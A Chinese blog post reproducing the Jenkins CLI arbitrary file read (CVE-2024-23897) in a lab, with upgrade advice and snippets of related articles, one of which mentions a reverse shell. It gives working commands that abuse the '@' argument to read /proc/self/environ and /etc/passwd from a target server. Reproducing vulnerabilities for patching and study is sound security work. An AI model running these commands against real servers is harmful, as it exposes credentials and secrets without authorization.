Jenkins 任意文件读取(CVE-2024-23897)修复及复现

最新推荐文章于 2025-04-25 00:15:00 发布
最新推荐文章于 2025-04-25 00:15:00 发布
阅读量1.2k 收藏 6
点赞数 5
分类专栏: Jenkins 漏洞相关 信息安全 文章标签: 中间件 jenkins 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55159054/article/details/144693673
版权

Jenkins任意文件读取漏洞CVE-2024-23897修复及复现


Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞详情

Jenkins 有一个内置的命令行界面(CLI),可从脚本或 shell 环境访问 Jenkins。处理 CLI 命令时, Jenkins 使用args4j库解析 Jenkins 控制器上的命令参数和选项。

近日,Jenkins 处理 CLI 命令的命令解析器中的 expandAtFile 功能存在任意文件读取漏洞,未经身份认证的远程攻击者利用该漏洞可以读取部分文件的有限行内容,攻击者经过身份验证或目标 Jenkins 更改了默认 “Security” 配置可以通过该漏洞读取任意文件,攻击者进一步利用该漏洞并结合其他功能可能导致任意代码执行。

影响范围

Jenkins 版本<= 2.441
Jenkins 版本<= LTS 2.426.2

漏洞复现

1、访问http://靶场IP:8080 显示Jenkins页面
首页
2、下载官方提供的命令行客户端

wget http://IP:8080/jnlpJars/jenkins-cli.jar

下载cli
3、使用该工具读取目标服务器的/proc/self/environ文件

java -jar jenkins-cli.jar -s http://IP:8080/ -http help 1 "@/proc/self/environ"

读取文件

4、使用该工具读取目标服务器的/etc/passwd文件

java -jar jenkins-cli.jar -s http://IP:8080/ who-am-i @/etc/passwd

读取passwd
5、java不兼容
如出现下图情况为java版本不兼容,卸载本机旧java,然后安装新版兼容的java版本即可。
不兼容

修复建议

升级至安全版本
参考链接:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
官网下载:https://www.jenkins.io/download/

Jenkins CLI 任意文件读取漏洞复现(CVE-2024-23897)
0xSec
01-26 3133
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。 2024年1月,互联网公开了一个Jenkins任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全
Jenkins-Remoting 任意文件读取漏洞(CVE-2024-43044)
iSee857的博客
09-10 2200
Jenkins 使用 Remoting 库(通常为agent.jar或remoting.jar)实现控制器与代理之间的通信,该库允许代理从控制器加载类和类加载器资源,以便从控制器发送的 Java 对象(构建步骤等)可以在代理上执行。当获取到node1机器的权限后,可以得到连接到Jenkins主服务器的secret和name,这时需要将连接使用的agent.jar替换成恶意的Agent连接Jar包。连接成功后在Jenkins主服务器上可以看到已连接的标识,成功连接之后就可以在Agent节点上部署任务了。
CVE-2024-23897-Jenkins任意文件读取漏洞复现
hcja666的博客
01-25 2760
Jenkins提供了一个命令行的接口,jenkins-clijar是它的命令行客户端,通过jenkins-clijar可以去执行一些Jenkins中的功能。利用条件:Jenkins 版本<= 2.441 和Jenkins 版本<= LTS 2.426.2+开启了Allow anonymous read access(读取完整文件)流程:因此根本原因是args4j这个库解析参数不当造成的。
【漏洞复现Jenkins文件读取漏洞(CVE-2024-23897
2301_80127209的博客
06-18 6991
jenkins是啥?简单理解就是:一个开源的、用于方便代码管理、部署的基于web的平台,用于提高团队开发效率(生产力)。Jenkins CLI 任意文件读取漏洞 CVE-2024-23897 是怎么回事?
CVE-2024-23897-Jenkins 2.441之前版本存在任意文件读取漏洞
最新发布
luxury的博客
04-25 538
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中'@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件
安全研究 | Jenkins 任意文件读取漏洞分析
weixin_33807284的博客
07-31 363
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一、漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 Orange (博客链接:blog.orange.tw/)挖出的 Jenkins 未授权任意文件读取漏洞。 **腾讯安全云鼎实...
【漏洞复现Jenkins CLI 接口任意文件读取漏洞(CVE-2024-23897
网络安全从业者的学习笔记
07-26 1498
Jenkins是一款基于JAVA开发的开源自动化服务器。 Jenkins使用`args4j`来解析命令行输入,并支持通过HTTP、WebSocket等协议远程传入命令行参数。在`args4j`中,用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 705
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
Jenkins任意文件读取CVE-2024-23897
2401_83944560的博客
04-11 800
Jenkins是一个开源的自动化服务器。Jenkins使用args4j来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。该漏洞影响Jenkins 2.441及以前的版本。
CVE-2024-23897 JenKins任意文件读取漏洞复现
m0_70489261的博客
02-27 3554
Jenkins提供了一个命令行的接口,用户可以在下载一个命令行客户端jenkins-cli.jar到本地,并调用该客户端来执行一些Jenkins的功能。
【已复现Jenkins 任意文件读取漏洞(CVE-2024-23897)附POC下载
Elliot1314的博客
01-28 4048
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。2024年1月,互联网公开了一个Jenkins任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全。内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件
【漏洞复现Jenkins CLI 任意文件读取漏洞(CVE-2024-23897
qq_38073067的博客
01-30 2361
【漏洞复现Jenkins CLI 任意文件读取漏洞(CVE-2024-23897
Jenkins:CVE-2024-23897[任意文件读取]
h1008685的博客
08-08 1521
Jenkins:CVE-2024-23897漏洞利用,poc工具使用
Jenkins任意文件读取漏洞复现(CVE-2024-23897)
m0_74125616的博客
04-02 420
3、根据靶场的路径编写命令,我这里的路径是 http://39.106.48.123:45277。2、下载编译好的二进制文件,我用的时window的。4、成功获取到flag。
2024年最新网络安全学习day6——永恒之黑漏洞复现2024年最新下血本买的
2401_84281594的博客
05-06 933
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。7)运行脚本,发起攻击。
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
热门推荐
黑剑
03-05 1万+
本文将深入研究一项涉及Jenkins安全漏洞(CVE-202423897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell。
Jenkins任意文件读取CVE-2024-23897),持续更新大厂面试笔试题
m0_61043185的博客
04-07 443
默认是这种方式,因此登陆即管理员权限,没有登录即匿名用户,这种权限方案中,管理员可以设置“匿名用户可读”选项。这个选项在后台的“Manage Jenkins-> “Security” 中管理员可以将其开启或关闭,默认是关闭的。实际测试中,如果我们访问Jenkins首页,发现强制跳转到登录页面,或者啥功能都没有直接报权限错误,就说明关闭了“匿名用户读”选项。
[CVE-2024-23897]Jenkins CLI 任意文件读取漏洞导致远程代码执行漏洞
whoami
01-26 4584
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等在 Jenkins 控制器中执行任意代码。Jenkins CLI 是 Jenkins 内置的命令行页面。
vulhub中的漏洞
03-30
| ActiveMQ | 提供了 ActiveMQ 文件上传漏洞 (CVE-2016-3088) 复现所需的容器配置 | | Jenkins | 支持未授权访问漏洞以及其他权限提升类漏洞的研究 | | Tomcat | 包含弱密码登录、任意文件读取等多种场景 | 更多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

鸭梨山大。

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值